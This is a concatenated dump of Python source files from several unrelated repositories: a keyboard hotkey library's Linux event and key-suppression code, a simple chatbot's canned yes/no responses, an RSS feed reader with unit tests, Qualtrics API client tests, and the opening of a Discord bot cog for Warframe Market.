def listen(queue, is_allowed=lambda *args: True):
build_device()
build_tables()
while True:
time, type, code, value, device_id = device.read_event()
if type != EV_KEY:
continue
scan_code = code
event_type = KEY_DOWN if value else KEY_UP # 0 = UP, 1 = DOWN, 2 = HOLD
try:
name = to_name[(scan_code, tuple(sorted(pressed_modifiers)))]
except KeyError:
name = to_name.get((scan_code, ()), 'unknown')
if name in ('alt', 'alt gr', 'ctrl', 'shift'):
if event_type == KEY_DOWN:
pressed_modifiers.add(name)
else:
pressed_modifiers.discard(name)
is_keypad = scan_code in keypad_scan_codes
queue.put(KeyboardEvent(event_type=event_type, scan_code=scan_code, name=name, time=time, device=device_id, is_keypad=is_keypad))
def write_event(scan_code, is_down):
build_device()
device.write_event(EV_KEY, scan_code, int(is_down))
def map_char(name):
build_tables()
if name in from_name:
return from_name[name]
parts = name.split(' ', 1)
if (name.startswith('left ') or name.startswith('right ')) and parts[1] in from_name:
return from_name[parts[1]]
else:
raise ValueError('Name {} is not mapped to any known key.'.format(repr(name)))
def press(scan_code):
write_event(scan_code, True)
def release(scan_code):
write_event(scan_code, False)
def type_unicode(character):
codepoint = ord(character)
hexadecimal = hex(codepoint)[len('0x'):]
for key in ['ctrl', 'shift', 'u']:
scan_code, _ = map_char(key)
press(scan_code)
for key in hexadecimal:
scan_code, _ = map_char(key)
press(scan_code)
release(scan_code)
for key in ['ctrl', 'shift', 'u']:
scan_code, _ = map_char(key)
release(scan_code)
if __name__ == '__main__':
def p(e):
print(e)
listen(p)
```
#### File: Symbolic-Math-Hotkeys/keyboard/_suppress.py
```python
from threading import Lock, Thread
from timeit import default_timer as timer
from keyboard._keyboard_event import normalize_name
import re
class KeyTable(object):
_keys = {}
_write = Lock() # Required to edit keys
_table = {}
_time = -1
_elapsed = 0 # Maximum time that has elapsed so far in the sequence
_read = Lock() # Required to edit table
_in_sequence = False
_keys_suppressed = [] # List of keys that have been suppressed so far in the sequence
_disable = False # Disables key suppression during replay to avoid infinite loop
SEQUENCE_END = 2 # Delimeter that signifies the end of the sequence
def __init__(self, press_key, release_key):
self.press_key = press_key
self.release_key = release_key
def is_allowed(self, key, is_up, advance=True):
"""
The goal of this function is to be very fast. This is accomplished
through the table structure, which ensures that we only need to
check whether `key is in self._table` and change what variable
is referenced by `self._table`.
Unfortunately, handling timeouts properly has added significantly to
the logic required, but the function should still be well within required
time limits.
"""
if self._disable:
return True
if key != self.SEQUENCE_END:
key = re.sub('(left|right) ', '', key)
time = timer()
if self._time == -1:
elapsed = 0
else:
elapsed = time - self._time
if self._elapsed > elapsed:
elapsed = self._elapsed
if is_up:
if self._in_sequence:
if key != self.SEQUENCE_END:
self._keys_suppressed.append((key, is_up))
return False
else:
advance = False
in_sequence = key in self._table and elapsed < self._table[key][0]
in_keys = key in self._keys
suppress = in_sequence or in_keys
if advance:
self._read.acquire()
if in_sequence and self._table[key][2]:
del self._keys_suppressed[:]
if in_sequence and self._table[key][1]:
self._table = self._table[key][1]
if self._time != -1:
self._elapsed = elapsed
self._time = -1
elif in_keys and self._keys[key][1]:
self._table = self._keys[key][1]
if self._time != -1:
self._elapsed = elapsed
self._time = -1
self._replay_keys()
del self._keys_suppressed[:]
else:
self._table = self._keys
self._time = -1
self._elapsed = -1
self._replay_keys()
del self._keys_suppressed[:]
self._in_sequence = in_sequence
self._read.release()
if key != self.SEQUENCE_END and suppress:
self._keys_suppressed.append((key, is_up))
return not suppress
def complete_sequence(self):
if self.SEQUENCE_END in self._table:
self.is_allowed(self.SEQUENCE_END, False)
self._read.acquire()
self._time = timer()
self._read.release()
else:
self._read.acquire()
self._time = -1
self._elapsed = 0
self._table = self._keys
self._replay_keys()
del self._keys_suppressed[:]
self._read.release()
def _replay_keys(self):
self._disable = True
for key, is_up in self._keys_suppressed:
if is_up:
self.release_key(key)
else:
self.press_key(key)
self._disable = False
def _refresh(self):
self._read.acquire()
self._disable = False
self._table = self._keys
self._read.release()
def _acquire_table(self, sequence, table, timeout):
"""
Returns a flat (single level) dictionary
:param sequence:
:param table:
:return:
"""
el = sequence.pop(0)
if el not in table:
table[el] = (timeout, {}, False)
if table[el][0] < timeout:
table[el][0] = timeout
if sequence:
return self._acquire_table(sequence, table[el][1], timeout)
else:
return table
def suppress_sequence(self, sequence, timeout):
"""
Adds keys to the suppress_keys table
:param sequence: List of scan codes
:param timeout: Time allowed to elapse before resetting
"""
# the suppress_keys table is organized
# as a dict of dicts so that the critical
# path is only checking whether the
# scan code is 'in current_dict'
flat = []
for subsequence in sequence:
flat.extend(subsequence)
flat.append(self.SEQUENCE_END)
last_index = flat[-1]
self._write.acquire()
table = self._acquire_table(flat, self._keys, timeout)
table[last_index] = (table[last_index][0], table[last_index][1], True)
self._refresh()
self._write.release()
def suppress_none(self):
"""
Clears the suppress_keys table and disables
key suppression
:return:
"""
self._write.acquire()
self._keys = {}
self._refresh()
self._write.release()
self._read.acquire()
self._disable = True
self._read.release()
``` |
{
"source": "3NiGMa404/Omnipotent",
"score": 2
} |
#### File: 3NiGMa404/Omnipotent/routput.py
```python
import pyttsx3
# initialisation
engine = pyttsx3.init()
def ret(text):
engine.say(text)
engine.runAndWait()
```
#### File: 3NiGMa404/Omnipotent/sets.py
```python
positives = ['yes', 'yep', 'for sure', 'affirmative', 'definitely']
negatives = ['no', 'nope', 'nah', 'nae']
class yesnoset:
def __init__(self, responses, beginnings, tag, savenoun=False):
self.beginnings = beginnings
self.responses = responses
self.tag = tag
self.savenoun = savenoun
do_you_p = yesnoset(['i do', 'yeah, i do'] +
positives, ["do you "], "!do_you_p!")
do_you_n = yesnoset(["nah, i dont", 'i do not'] +
negatives, ["do you "], "!do_you_n!")
do_i_p = yesnoset(['you do', 'i think you do'] +
positives, ["do i "], "!do_i_p!")
dont_i_p = yesnoset(['you do', 'i think you do'] +
positives, ["dont i ,dont i "], "!dont_i_p!")
dont_i_n = yesnoset(["you dont", "i dont you do"] +
negatives, ["dont i ,dont i "], "!dont_i_n!")
dont_u_p = yesnoset(['i do', 'i think i do'] + positives,
["dont you ,dont you "], "!dont_u_p!")
dont_u_n = yesnoset(["i dont", 'i do not', "i dont think i do"] +
negatives, ["dont you ,dont you "], "!dont_u_n!")
do_i_n = yesnoset(["you dont", "i dont think you do"] +
negatives, ["do i "], "!do_i_n!")
things_i_can_do = ['talk', 'read', 'speak', 'understand me', 'understand']
can_i_p = yesnoset(['you can!',
'yes, you can',
'i think you can'] + positives,
['can i '],
"!can_i_p!")
can_i_n = yesnoset(["you cant",
"nah, you cant",
"i dont think you can"] + negatives,
['can i '],
"!can_i_n!")
can_u_p = yesnoset(['yes, i can', 'i can', 'i think i can'] +
positives, ['can you '], "!can_u_p!")
can_u_n = yesnoset(["no i cant",
'i can not',
"i dont think i can"] + negatives,
['can you '],
"!can_u_n!")
will_i_p = yesnoset(['yes you will',
'you will',
'i think you will'] + positives,
['will i '],
"!will_i_p!")
will_i_n = yesnoset(["i dont think you will",
'no you will not',
'you will not'] + negatives,
['will i '],
"!will_i_n!")
will_u_p = yesnoset(['yes i will', 'i will', 'i think i will'] +
positives, ['will you '], "!will_u_p!")
will_u_n = yesnoset(["i dont think i will",
'no i will not',
'i will not',
"i wont"] + negatives,
['will you '],
"!will_u_n!")
wont_i_p = yesnoset(['you will', 'i think you will'] +
positives, ["wont i ", "wont i "], "!wont_i_p!")
wont_i_n = yesnoset(["i dont think you will", "you wont"] +
negatives, ["wont i ", "wont i "], "!wont_i_n!")
wont_u_p = yesnoset(['i will', 'i think i will'] +
positives, ["wont you ", "wont you "], "!wont_u_p!")
wont_u_n = yesnoset(["i dont think i will", "i wont"] +
negatives, ["wont you ", "wont you "], "!wont_u_n!")
would_i_p = yesnoset(['you would',
'i think you would',
'yeah, you would'] + positives,
["would i "],
"!would_i_p!")
would_i_n = yesnoset(["you wouldnt",
"i dont think you would",
"nah, you wouldnt"] + negatives,
["would i "],
"!would_i_n!")
would_u_p = yesnoset(['i would',
'i think i would',
'yeah, i would'] + positives,
["would you "],
"!would_u_p!")
would_u_n = yesnoset(["i wouldnt",
"i dont think i would",
"nah, i wouldnt"] + negatives,
["would you "],
"!would_u_n!")
wouldnt_i_p = yesnoset(['you would', 'i think you would'] +
positives, ["wouldnt i ", "wouldnt i "], "!wouldnt_i_p!")
wouldnt_i_n = yesnoset(["you wouldnt",
"i dont think you would",
"nah, you wouldnt"] + negatives,
["wouldnt i ",
"wouldnt i "],
"!wouldnt_i_n!")
wouldnt_u_p = yesnoset(['i would', 'i think i would'] +
positives, ["wouldnt you ", "wouldnt you "], "!wouldnt_u_p!")
wouldnt_u_n = yesnoset(["i wouldnt",
"i dont think i would",
"i would not"] + negatives,
["wouldnt you ",
"wouldnt you "],
"!wouldnt_u_n!")
could_i_p = yesnoset(['you could',
'i think you could',
'yeah, you could'] + positives,
["could i "],
"!could_i_p!")
could_i_n = yesnoset(["you couldnt",
"i dont think you could",
"nah, you couldnt"] + negatives,
["could i "],
"!could_i_n!")
could_u_p = yesnoset(['i could',
'i think i could',
'yeah, i could'] + positives,
["could you "],
"!could_u_p!")
could_u_n = yesnoset(["i couldnt",
"i dont think i could",
"nah, i couldnt"] + negatives,
["could you "],
"!could_u_n!")
couldnt_i_p = yesnoset(['you could', 'i think you could'] +
positives, ["couldnt i ", "couldnt i "], "!couldnt_i_p!")
couldnt_i_n = yesnoset(["you couldnt",
"i dont think you could",
"nah, you couldnt"] + negatives,
["couldnt i ",
"couldnt i "],
"!couldnt_i_n!")
couldnt_u_p = yesnoset(['i could', 'i think i could'] +
positives, ["couldnt you ", "couldnt you "], "!couldnt_u_p!")
couldnt_u_n = yesnoset(["i couldnt",
"i dont think i could",
"i could not"] + negatives,
["couldnt you ",
"couldnt you "],
"!couldnt_u_n!")
should_i_p = yesnoset(['you should',
'i think you should',
'yeah, you should'] + positives,
["should i "],
"!should_i_p!")
should_i_n = yesnoset(["you shouldnt",
"i dont think you should",
"nah, you shouldnt"] + negatives,
["should i "],
"!should_i_n!")
should_u_p = yesnoset(['i should',
'i think i should',
'yeah, i should'] + positives,
["should you "],
"!should_u_p!")
should_u_n = yesnoset(["i shouldnt",
"i dont think i should",
"nah, i shouldnt"] + negatives,
["should you "],
"!should_u_n!")
shouldnt_i_p = yesnoset(['you should', 'i think you should'] +
positives, ["shouldnt i ", "shouldnt i "], "!shouldnt_i_p!")
shouldnt_i_n = yesnoset(["you shouldnt",
"i dont think you should",
"nah, you shouldnt"] + negatives,
["shouldnt i ",
"shouldnt i "],
"!shouldnt_i_n!")
shouldnt_u_p = yesnoset(['i should', 'i think i should'] +
positives, ["shouldnt you ", "shouldnt you "], "!shouldnt_u_p!")
shouldnt_u_n = yesnoset(["i shouldnt",
"i dont think i should",
"i should not"] + negatives,
["shouldnt you ",
"shouldnt you "],
"!shouldnt_u_n!")
was_i_p = yesnoset(['yes, you were',
'you were',
'i think you were'] + positives,
["was i "],
"!was_i_p!")
was_i_n = yesnoset(["nah, you werent",
"you werent",
"i dont think you were"] + negatives,
["was i "],
"!was_i_n!")
were_u_p = yesnoset(['i was', 'yeah, i was'] +
positives, ["were you "], "!were_u_p!")
were_u_n = yesnoset(["i wasnt", "nah, i wasnt"] +
negatives, ["were you "], "!were_u_n!")
are_u_p = yesnoset(['i am', 'yeah, i am', 'i think i am'] +
positives, ["are you "], "!are_u_p!")
are_u_n = yesnoset(['i am not',
"nah, im not",
"i dont think i am"] + negatives,
["are you "],
"!are_u_n!")
arent_u_p = yesnoset(['i am', 'i think i am'] + positives,
["arent you ", "arent you "], "!arent_u_p!")
arent_u_n = yesnoset(['i am not', "i dont think i am"] +
negatives, ["arent you ", "arent you "], "!arent_u_n!")
cant_u_p = yesnoset(['i can', 'i think i can'] + positives,
['cant you ', "cant you "], '!cant_u_p!')
cant_u_n = yesnoset(['i can not', 'i dont think i can'] +
negatives, ['cant you ', "cant you "], '!cant_u_p!')
cant_i_p = yesnoset(['you can!', 'i think you can'] +
positives, ['cant i ', "cant i "], '!cant_i_p!')
cant_i_n = yesnoset(['you can not!',
"no, you cant",
"i dont think you can"] + negatives,
['cant i ',
"cant i "],
'!cant_i_n!')
i_will_n = yesnoset(['i wont', 'i wont'], ['i will '], '!i_will_n!')
i_will_p = yesnoset(['same', 'so will i'], ['i will '], '!i_will_p!')
i_will_q = yesnoset(['are you sure', 'why though'], ['i will '], '!i_will_q!')
i_wont_n = yesnoset(['same', 'nor will i'], [
'i wont ', "i wont"], '!i_wont_n!')
i_wont_p = yesnoset(['really, i will', 'i will'], [
'i wont ', "i wont"], '!i_wont_p!')
i_wont_q = yesnoset(['are you sure', 'why not'], [
'i wont ', "i wont"], '!i_will_q!')
i_dont_n = yesnoset(['same', 'nor do i'], ['i dont ', "i dont"], '!i_dont_n!')
i_dont_p = yesnoset(['really, i do', 'i do'], [
'i dont ', "i dont"], '!i_dont_p!')
i_dont_q = yesnoset(['are you sure', 'why not'], [
'i dont ', "i dont"], '!i_dont_q!')
i_would_n = yesnoset(["i wouldnt", 'really, i would not'], [
'i would '], '!i_would_n!')
i_would_p = yesnoset(['same', 'so would i'], ['i would '], '!i_would_p!')
i_would_q = yesnoset(['are you sure', 'why though'],
['i would '], '!i_would_q!')
i_wouldnt_p = yesnoset(["i would", 'really, i would'], [
'i wouldnt ', "i wouldnt"], '!i_would_n!')
i_wouldnt_n = yesnoset(['same', 'nor would i'], [
'i wouldnt ', "i wouldnt"], '!i_would_p!')
i_wouldnt_q = yesnoset(['are you sure', 'why not'], [
'i wouldnt ', "i wouldnt"], '!i_would_q!')
i_could_n = yesnoset(["i couldnt", 'really, i could not'], [
'i could '], '!i_could_n!')
i_could_p = yesnoset(['same', 'so could i'], ['i could '], '!i_could_p!')
i_could_q = yesnoset(['are you sure', 'why though'],
['i could '], '!i_could_q!')
i_couldnt_p = yesnoset(["i could", 'really, i could'], [
'i couldnt ', "i couldnt"], '!i_could_n!')
i_couldnt_n = yesnoset(['same', 'nor could i'], [
'i couldnt ', "i couldnt"], '!i_could_p!')
i_couldnt_q = yesnoset(['are you sure', 'why not'], [
'i couldnt ', "i couldnt"], '!i_could_q!')
i_should_n = yesnoset(["i shouldnt", 'really, i should not'], [
'i should '], '!i_should_n!')
i_should_p = yesnoset(['same', 'so should i'], ['i should '], '!i_should_p!')
i_should_q = yesnoset(['are you sure', 'why though'],
['i should '], '!i_should_q!')
i_shouldnt_p = yesnoset(["i should", 'really, i should'], [
'i shouldnt ', "i shouldnt"], '!i_should_n!')
i_shouldnt_n = yesnoset(['same', 'nor should i'], [
'i shouldnt ', "i shouldnt"], '!i_should_p!')
i_shouldnt_q = yesnoset(['are you sure', 'why not'], [
'i shouldnt ', "i shouldnt"], '!i_should_q!')
# New
i_think_p = yesnoset(['i agree', 'same', 'i think so too', 'agreed'], [
"i think "], '!i_think_p!')
i_think_n = yesnoset(['i disagree', "i dont think so", "i dont", 'disagree'], [
"i think "], '!i_think_n!')
i_think_q = yesnoset(['why do you think that', "why"],
["i think "], '!i_think_q!')
# Noun
dont_noun_p = yesnoset(['they do', 'i think they do'] +
positives, ["dont ,dont "], "!dont_noun_p!", True)
dont_noun_n = yesnoset(["they dont", "i dont think they do"] +
negatives, ["dont ", "dont "], "!dont_noun_n!", True)
arent_noun_p = yesnoset(['they are', 'i think they are'] +
positives, ["arent ", "arent "], "!arent_noun_p!", True)
arent_noun_n = yesnoset(['they are not', "i dont think they are"] +
negatives, ["arent ", "arent "], "!arent_noun_n!", True)
are_noun_p = yesnoset(['they are',
'i think they are',
'yes, they are'] + positives,
["are "],
"!are_noun_p!",
True)
are_noun_n = yesnoset(['they are not',
"i dont think they are",
"nah, they're not"] + negatives,
["are "],
"!are_noun_n!",
True)
do_noun_p = yesnoset(['they do',
'i think they do',
'yeah, they do'] + positives,
['do '],
"!do_noun_p!",
True)
do_noun_n = yesnoset(["they dont",
'they do not',
"i dont think they do"] + negatives,
['do '],
"!do_noun_n!",
True)
is_noun_p = yesnoset(['it is', 'yes, it is', 'yeah, it is'] +
positives, ['is '], "!is_noun_p!", True)
is_noun_n = yesnoset(["it isnt",
'no, it is not',
"nah, it isnt"] + negatives,
['is '],
"!is_noun_n!",
True)
isnt_noun_p = yesnoset(['it is', 'yes, it is', 'yeah, it is'], [
'isnt ', "isnt"], "!isnt_noun_p!", True)
isnt_noun_n = yesnoset(["it isnt", 'no, it is not', "nah, it isnt"], [
'isnt ', "isnt"], "!isnt_noun_n!", True)
can_noun_p = yesnoset(['they can', 'yes, they can'] +
positives, ['can '], '!can_noun_p!', True)
# Replace it with they if plural and vice versa, if savenoun=True
can_noun_n = yesnoset(['they cannot', "no, they cant"] +
negatives, ['can '], '!can_noun_n!', True)
cant_noun_p = yesnoset(['they can', 'yes, they can'], [
'cant ', "cant "], '!cant_noun_p!', True)
cant_noun_n = yesnoset(['they cannot', "no, they cant"], [
'cant ', "cant "], '!cant_noun_n!', True)
was_noun_p = yesnoset(['yes, it was',
'it was',
'i think it was'] + positives,
["was "],
"!was_noun_p!",
True)
was_noun_n = yesnoset(["no, it wasnt",
"it wasnt",
"i dont think it was"] + negatives,
["was "],
"!was_noun_n!",
True)
wasnt_noun_p = yesnoset(['yes, it was', 'it was', 'i think it was'], [
"wasnt ", "wasnt"], "!wasnt_noun_p!", True)
wasnt_noun_n = yesnoset(["no, it wasnt", "it wasnt", "i dont think it was"], [
"wasnt ", "wasnt"], "!wasnt_noun_n!", True)
will_noun_p = yesnoset(['yes it will',
'it will',
'i think it will'] + positives,
['will '],
"!will_noun_p!",
True)
will_noun_n = yesnoset(['no it will not',
"it wont",
"i dont think it will"] + negatives,
['will '],
"!will_noun_n!",
True)
wont_noun_p = yesnoset(['yes it will', 'it will', 'i think it will'], [
"wont ", "wont "], "!wont_noun_p!", True)
wont_noun_n = yesnoset(['no it will not', "it wont", "i dont think it will"], [
"wont ", "wont "], "!wont_noun_n!", True)
would_noun_p = yesnoset(['they would',
'i think they would',
'yeah, they would'] + positives,
["would "],
"!would_noun_p!",
True)
would_noun_n = yesnoset(["they wouldnt",
"i dont think they would",
"nah, they wouldnt"] + negatives,
["would "],
"!would_noun_n!",
True)
wouldnt_noun_p = yesnoset(['they would', 'i think they would', 'yeah, they would'], [
"wouldnt ", "wouldnt "], "!wouldnt_noun_p!", True)
wouldnt_noun_n = yesnoset(["they wouldnt",
"i dont think they would",
"nah, they wouldnt"],
["wouldnt ",
"wouldnt "],
"!wouldnt_noun_n!",
True)
could_noun_p = yesnoset(['they could',
'i think they could',
'yeah, they could'] + positives,
["could "],
"!could_noun_p!",
True)
could_noun_n = yesnoset(["they couldnt",
"i dont think they could",
"nah, they couldnt"] + negatives,
["could "],
"!could_noun_n!",
True)
couldnt_noun_p = yesnoset(['they could', 'i think they could', 'yeah, they could'], [
"couldnt ", "couldnt "], "!couldnt_noun_p!", True)
couldnt_noun_n = yesnoset(["they couldnt",
"i dont think they could",
"nah, they couldnt"],
["couldnt ",
"couldnt "],
"!couldnt_noun_n!",
True)
should_noun_p = yesnoset(['they should',
'i think they should',
'yeah, they should'] + positives,
["should "],
"!should_noun_p!",
True)
should_noun_n = yesnoset(["they shouldnt",
"i dont think they should",
"nah, they shouldnt"] + negatives,
["should "],
"!should_noun_n!",
True)
shouldnt_noun_p = yesnoset(['they should', 'i think they should', 'yeah, they should'], [
"shouldnt ", "shouldnt "], "!shouldnt_noun_p!", True)
shouldnt_noun_n = yesnoset(["they shouldnt",
"i dont think they should",
"nah, they shouldnt"],
["shouldnt ",
"shouldnt "],
"!shouldnt_noun_n!",
True)
were_noun_p = yesnoset(['they were',
'i think they were',
'yeah, they were'] + positives,
["were "],
"!were_noun_p!",
True)
were_noun_n = yesnoset(["they werent",
"i dont think they were",
"nah, they werent"] + negatives,
["were "],
"!were_noun_n!",
True)
werent_noun_p = yesnoset(['they were', 'i think they were', 'yeah, they were'], [
"werent ", "werent "], "!werent_noun_p!", True)
werent_noun_n = yesnoset(["they werent", "i dont think they were", "nah, they werent"], [
"werent ", "werent "], "!werent_noun_n!", True)
# Me
me = open('Me.txt', 'r')
me_r = me.read()
me.close()
things_i_am = me_r.split('\n')
all_resp = [
do_you_p,
do_you_n,
do_i_p,
dont_i_p,
dont_i_n,
dont_u_p,
dont_u_n,
do_i_n,
can_i_p,
can_i_n,
can_u_p,
can_u_n,
will_i_p,
will_i_n,
will_u_p,
will_u_n,
wont_i_p,
wont_i_n,
wont_u_p,
wont_u_n,
would_i_p,
would_i_n,
would_u_p,
would_u_n,
wouldnt_i_p,
wouldnt_i_n,
wouldnt_u_p,
wouldnt_u_n,
could_i_p,
could_i_n,
could_u_p,
could_u_n,
couldnt_i_p,
couldnt_i_n,
couldnt_u_p,
couldnt_u_n,
should_i_p,
should_i_n,
should_u_p,
should_u_n,
shouldnt_i_p,
shouldnt_i_n,
shouldnt_u_p,
shouldnt_u_n,
was_i_p,
was_i_n,
were_u_p,
were_u_n,
are_u_p,
are_u_n,
arent_u_p,
arent_u_n,
cant_u_p,
cant_u_n,
cant_i_p,
cant_i_n,
dont_noun_p,
dont_noun_n,
arent_noun_p,
arent_noun_n,
are_noun_p,
are_noun_n,
do_noun_p,
do_noun_n,
is_noun_p,
is_noun_n,
isnt_noun_p,
isnt_noun_n,
can_noun_p,
can_noun_n,
cant_noun_p,
cant_noun_n,
was_noun_p,
was_noun_n,
wasnt_noun_p,
wasnt_noun_n,
will_noun_p,
will_noun_n,
wont_noun_p,
wont_noun_n,
would_noun_p,
would_noun_n,
wouldnt_noun_p,
wouldnt_noun_n,
could_noun_p,
could_noun_n,
couldnt_noun_p,
couldnt_noun_n,
should_noun_p,
should_noun_n,
shouldnt_noun_p,
shouldnt_noun_n,
were_noun_p,
were_noun_n,
werent_noun_p,
werent_noun_n,
i_will_n,
i_will_p,
i_will_q,
i_wont_n,
i_wont_p,
i_wont_q,
i_dont_n,
i_dont_p,
i_dont_q,
i_would_n,
i_would_p,
i_would_q,
i_wouldnt_p,
i_wouldnt_n,
i_wouldnt_q,
i_could_n,
i_could_p,
i_could_q,
i_couldnt_p,
i_couldnt_n,
i_couldnt_q,
i_should_n,
i_should_p,
i_should_q,
i_shouldnt_p,
i_shouldnt_n,
i_shouldnt_q,
i_think_p,
i_think_n,
i_think_q]
``` |
{
"source": "3nterz/rss-feed-reader",
"score": 3
} |
#### File: 3nterz/rss-feed-reader/app.py
```python
from sys import stdout
from typing import Optional, Sequence, TextIO
from model import RSSFeedChannel
from cli import CLIParser
from cli import CLIWriter
from rssfeedloader import RSSFeedLoader
from rssfeedreader import RSSFeedReader
from feedloaders import FeedParserRSSFeedLoader
def get_default_feedloader(rss_feed_url: str) -> RSSFeedLoader:
"""Factory method for default RSSFeedLoader implementation"""
return FeedParserRSSFeedLoader(rss_feed_url)
def get_default_feedreader(file: TextIO) -> RSSFeedReader:
"""Factory method for default RSSFeedReader implementation"""
return CLIWriter(file=file)
def main(output_stream: TextIO=stdout, args: Optional[Sequence[str]]=None) -> None:
"""Application entry point for RSS Feed Reader"""
cli_parser: CLIParser = CLIParser(file=output_stream)
cli_writer: RSSFeedReader = get_default_feedreader(file=output_stream)
cli_parser.parse_rss_feed_urls_from_args(args)
rss_feed_url_list: list[str] = [str(url) for url in cli_parser.get_list_of_rss_feed_urls()]
# in the backgeound process all feed urls
feedloader_list: list[RSSFeedLoader] = []
rss_feed_url: str
for rss_feed_url in rss_feed_url_list:
feedloader: RSSFeedLoader = get_default_feedloader(rss_feed_url)
feedloader.load_rss_feed()
feedloader_list.append(feedloader)
# display all output together
feedloader: RSSFeedLoader
for feedloader in feedloader_list:
rss_feed_channel: RSSFeedChannel = feedloader.get_rss_feed_channel()
cli_writer.show_rss_feed_content(rss_feed_channel)
if __name__ == '__main__':
main()
```
#### File: 3nterz/rss-feed-reader/feedloaders_test.py
```python
from typing import Any, Callable
import unittest
from model import RSSFeedChannel, RSSFeedItem
from feedloaders import _convert_html_content_to_text, _strip_whitespace
from feedloaders import FeedParserRSSFeedLoader
class TestRSSFeedParsers(unittest.TestCase):
"""Tests for module feedloaders members including class FeedParserRSSFeedLoader
"""
def test_convert_html_content_to_text(self) -> None:
"""Verify html entities in HTML content are removed when converted to plain text
"""
test_data: str = '<p>Paragraph</p>'
actual_result: str = _convert_html_content_to_text(test_data) #pylint: disable=protected-access
expected_result: str = 'Paragraph'
self.assertEqual(actual_result, expected_result)
def test_strip_whitespace(self) -> None:
"""Verify leading and trailing whitespace are removed when invoking method
"""
test_data: str = ' 123 '
actual_result: str = _strip_whitespace(test_data) #pylint: disable=protected-access
expected_result: str = '123'
self.assertEqual(actual_result, expected_result)
def test_parse_rss_feed_by_url(self) -> None:
"""Verify calling _parse_rss_feed_by_url with empty string does not return None
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
actual_instance_object: dict[str, Any] = feedparser._parse_rss_feed_by_url('') #pylint: disable=protected-access
self.assertIsNotNone(actual_instance_object)
def template_test_check_dict_result(self,
method: Callable[[dict[str, Any]], dict[str, Any]],
test_data: dict[str, Any], expected_result: str) -> None:
"""Template method to perform invoke common set of code statements across
multiple test methods.
"""
actual_result: dict[str, Any] = method(test_data)
self.assertEqual(actual_result, expected_result)
def test_get_parsed_rss_feed_channel(self) -> None:
"""Verify specifying test data with key 'feed' correctly resolves the value
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
self.template_test_check_dict_result(
feedparser._get_parsed_rss_feed_channel, #pylint: disable=protected-access
test_data={'feed':'result'},
expected_result='result'
)
def test_get_parsed_rss_feed_item_list(self) -> None:
"""Verify specifying test data with key 'entries' correctly resolves the value
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
self.template_test_check_dict_result(
feedparser._get_parsed_rss_feed_item_list, #pylint: disable=protected-access
test_data={'entries':'result'},
expected_result='result'
)
def test_convert_parsed_rss_feed_item_to_rss_feed_item(self) -> None:
"""Verify dict is successfully converted to RSSFeedItem
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
test_data: dict[str, Any] = dict(
title='Some title',
description='Some description here.',
link='http://somelink.lnk'
)
actual_result: RSSFeedItem = feedparser._convert_parsed_rss_feed_item_to_rss_feed_item( #pylint: disable=W0212
test_data)
expected_result: RSSFeedItem = RSSFeedItem(
title='Some title',
description='Some description here.',
link='http://somelink.lnk'
)
self.assertEqual(actual_result, expected_result)
def test_convert_parsed_rss_feed_to_rss_feed_channel(self) -> None:
"""Verify dict is successfully converted to RSSFeedChannel
"""
feedparser: FeedParserRSSFeedLoader = FeedParserRSSFeedLoader('')
test_data: dict[str, Any] = {
'feed': {
'title': 'Some feed title',
'description': 'Some feed description here.',
'link': 'http://somefeedlink.lnk'
},
'entries': [{
'title': 'Some item title',
'description': 'Some item description here.',
'link': 'http://someitemlink.lnk'
},]
}
actual_result: RSSFeedChannel = feedparser._convert_parsed_rss_feed_to_rss_feed_channel( #pylint: disable=W0212
test_data)
expected_result_item: RSSFeedItem = RSSFeedItem(
title='Some item title',
description='Some item description here.',
link='http://someitemlink.lnk'
)
expected_result_items: list[RSSFeedItem] = list[RSSFeedItem]()
expected_result_items.append(expected_result_item)
expected_result: RSSFeedChannel = RSSFeedChannel(
title='Some feed title',
description='Some feed description here.',
link='http://somefeedlink.lnk',
items=expected_result_items
)
self.assertEqual(actual_result, expected_result)
``` |
{
"source": "3nth/qualpy",
"score": 3
} |
#### File: qualpy/tests/core_tests.py
```python
import json
import os
from os import path
import pprint
from nose.tools import *
from qualpy.core import Qualtrics
class test_qualtrics(object):
def __init__(self):
self.q = None
self.pp = pprint.PrettyPrinter()
def setup(self):
self.q = Qualtrics()
if not path.exists('tests_out'):
os.makedirs('tests_out')
def teardown(self):
pass
def test_get_surveys(self):
surveys = self.q.get_surveys()
with open('tests_out/surveys.py', 'wt') as f:
f.write(self.pp.pformat(surveys))
def test_get_survey(self):
survey_id = self.q.get_surveys()[0]['SurveyID']
survey = self.q.get_survey(survey_id)
with open('tests_out/survey.xml', 'wt') as f:
f.write(str(survey))
def test_get_panels(self):
panels = self.q.get_panels()
with open('tests_out/panels.json', 'wt') as f:
f.write(str(panels))
def test_get_panel(self):
panels = self.q.get_panels()
for panel in panels:
p = self.q.get_panel_data(panel['PanelID'])
with open('tests_out/panel_{0}.json'.format(panel['PanelID']), 'wt') as f:
f.write(str(p))
def test_get_recipient(self):
panel = self.q.get_panels()[0]
id = self.q.get_panel_data(panel['PanelID'])[1][0]
recipient = self.q.get_recipient(id)
with open('tests_out/recipient.json', 'wt') as f:
f.write(str(recipient))
def test_create_distribution(self):
pass
panels = self.q.create_distribution('', '')
with open('tests_out/create_distribution.json', 'wt') as f:
f.write(str(panels))
``` |
{
"source": "3nws/beako-bot",
"score": 2
} |
#### File: 3nws/beako-bot/ChannelList.py
```python
from commands.db.r_db import commands_add_channel, commands_remove_channel
class ChannelList:
def __init__(self, series, channel_id):
self.series = series
self.channel_id = channel_id
async def add_channel(self, bot, i):
res = await commands_add_channel(bot, i, self.channel_id, self.series)
return res
async def remove_channel(self, bot, i):
res = await commands_remove_channel(bot, i, self.channel_id, self.series)
return res
```
#### File: beako-bot/cogs/WarframeMarket.py
```python
import discord
import random
import os
import aiohttp
import json
from discord.ext import commands
from discord import app_commands
from typing import List
class WarframeMarket(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
self.base_url = "https://api.warframe.market/v1"
self.items_list = {}
self.is_synced = False
self.image_url = "https://warframe.market/static/assets"
async def sync(self):
async with aiohttp.ClientSession() as session:
async with session.get(self.base_url+"/items") as r:
if r.status == 200:
response = await r.read()
self.items_list = json.loads(response)['payload']['items']
self.is_synced = True
else:
print("WarframeMarket down!")
@commands.command()
@commands.is_owner()
async def sync_items(self, ctx):
